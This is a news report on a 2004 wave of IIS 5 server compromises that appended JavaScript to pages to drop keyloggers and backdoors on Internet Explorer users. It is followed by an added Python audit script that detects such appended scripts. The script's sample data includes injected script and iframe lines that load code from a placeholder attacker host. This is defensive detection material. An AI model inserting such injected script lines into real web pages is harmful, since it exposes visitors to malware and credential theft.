
UPDATED: Widespread attack under way

A widespread Internet attack has hit thousands of Web sites in the past week, planting malware on vulnerable machines. Credit card theft is the suspected motive.

A widespread Internet attack has hit thousands of Web sites in the past week, planting malware on vulnerable machines that may be designed to steal credit card and other information then marketed to organized identity theft markets, according to government officials and information security experts.

"This is nasty by the look of it," said Scott Blake, vice president of information security at BindView Corp. of Houston. "This appears to be a zero-day exploit, and that's a big concern that's hard to respond to. In this case, we're not sure of a workaround, but we're hoping to come up with one as quickly as possible."

The U.S. Computer Emergency Readiness Team (US-CERT) said in an advisory that it is aware of suspicious activity focused on sites running Microsoft Internet Information Services 5.0 and Internet Explorer, components of Windows.

"Compromised sites are appending JavaScript to the bottom of Web pages," the advisory said. "When executed, this JavaScript attempts to access a file hosted on another server. This file may contain malicious code that can affect the end user's system. US-CERT is investigating the origin of the IIS 5 compromises and the impact of the code that is downloaded to end user systems."

The agency recommends IT administrators running IIS 5 verify that there is no unusual JavaScript appended to the bottom of pages delivered by their Web server and that end users disable JavaScript unless it is absolutely necessary.

Microsoft is also investigating the attack, and said customers who have deployed Windows XP Service Pack 2 RC2 are not at risk. The software giant said in a new security bulletin that Web servers running Windows 2000 Server and IIS that have not applied fixes outlined in MS04-011 are possibly being compromised. The bulletin advises systems administrators to apply the patches in MS04-011.

The Internet Storm Center, a service of the SANS Institute of Bethesda, Md., said in its last report that "a large number of Web sites, some of them quite popular, [were] compromised earlier this week to distribute malicious code." It did not elaborate on which ones were impacted.

"Hundreds to thousands of computers could feasibly be infected in just a few hours using compromised IIS servers as the launching pad for this attack," Ken Dunham, director of malicious code for iDEFENSE Inc. of Reston, Va., said in an e-mail. "Everyone needs to audit recent patches and ensure that computers are fully patched. Additionally, IE users should consider modifying the Windows registry to set the 'kill bit' until a patch is available."

Dunham said such Trojans have historically been developed by the HangUP Team out of Russia, a for-profit malicious code group. They are designed to steal credit card and other information that is then marketed to organized identity theft markets. The HangUP Team is the same group responsible for the recent rash of Korgo worms that attack the LSASS vulnerability of MS04-011.

The Internet Storm Center said, "If a user visited an infected site, the javascript delivered by the site would instruct the user's browser to download an executable from a Russian Web site and install it. Different executables were observed. These Trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system."

The report added, "We do not know at this point how the affected servers have been compromised. The SSL-PCT exploit is at the top of our list of suspects. If you find a compromised server, we strongly recommend a complete rebuild. You may be able to get your Web site back into business by changing the footer setting and removing the javascript file. But this is likely a very sophisticated attack and you should expect other stealthy backdoors."
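The two pieces of advice above, US-CERT's (verify that nothing unusual is appended to pages the server delivers) and the Storm Center's (the footer setting is what appends the script), point to the same check: compare what the server actually returns with the file on disk, because a footer-style injection leaves the on-disk file untouched and only the response carries the extra script. The audit script below is an added example written for this article, not code from US-CERT, the Storm Center or Microsoft. The two HTML samples, the host name attacker.invalid and the allowlist are constructed for illustration; a real run would replace them with the server's response and the corresponding file under the Web root.

```python
"""Audit served HTML for JavaScript appended after the document proper.

Added example, not from the original article. The server response and the
on-disk file are constructed samples; attacker.invalid is a placeholder host.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: the page as it exists under the Web root.
PAGE_ON_DISK = """<html><head><title>Shop</title></head>
<body><h1>Welcome</h1><script src="/js/menu.js"></script></body></html>
"""

# Constructed sample: what a footer setting would tack onto every response.
APPENDED = (
    '<script src="http://attacker.invalid/loader.js"></script>\n'
    "<script>document.write('<iframe src=http://attacker.invalid/x.html></iframe>')</script>\n"
)
PAGE_AS_SERVED = PAGE_ON_DISK + APPENDED

# Crude but sufficient for an audit: script elements and their src attribute.
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def trailing_content(served: str, on_disk: str) -> str:
    """Return whatever the server added beyond the on-disk file.

    '' means the response is byte-for-byte the file. If the response does not
    even start with the file, the whole response is returned as suspect.
    """
    if served.startswith(on_disk):
        return served[len(on_disk):]
    return served


def scripts_after_html_close(html: str) -> list:
    """Script elements that appear after </html>, where no script belongs."""
    m = re.search(r"</html\s*>", html, re.IGNORECASE)
    tail = html[m.end():] if m else ""
    return [(attrs.strip(), body.strip()) for attrs, body in SCRIPT_TAG.findall(tail)]


def external_script_hosts(html: str, allowed_hosts) -> list:
    """Hosts of <script src=...> references that are not on the allowlist.

    Relative URLs (no host) are the site's own scripts and are skipped.
    """
    allowed = {h.lower() for h in allowed_hosts}
    hosts = []
    for attrs, _ in SCRIPT_TAG.findall(html):
        m = SRC_ATTR.search(attrs)
        if not m:
            continue
        host = urlsplit(m.group(1)).hostname
        if host and host.lower() not in allowed:
            hosts.append(host.lower())
    return hosts


def audit(served: str, on_disk: str, allowed_hosts=frozenset()) -> dict:
    """Combine the three checks into one report for a single page."""
    tail = trailing_content(served, on_disk)
    return {
        "appended_bytes": len(tail),
        "scripts_after_html": scripts_after_html_close(served),
        "unexpected_hosts": external_script_hosts(served, allowed_hosts),
    }


if __name__ == "__main__":
    report = audit(PAGE_AS_SERVED, PAGE_ON_DISK, allowed_hosts={"www.example.com"})
    for key, value in report.items():
        print(f"{key}: {value}")
```

Any non-zero `appended_bytes` on a static page is a finding in itself, since a server should not return more than the file; the other two checks catch the case where the injected script was written into the files rather than added by the footer setting. As the Storm Center notes, a clean result from this audit does not clear the host: the injection is evidence of a server compromise, and a rebuild is still the safe course.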

Further details of the attack can be found on the Internet Storm Center site.
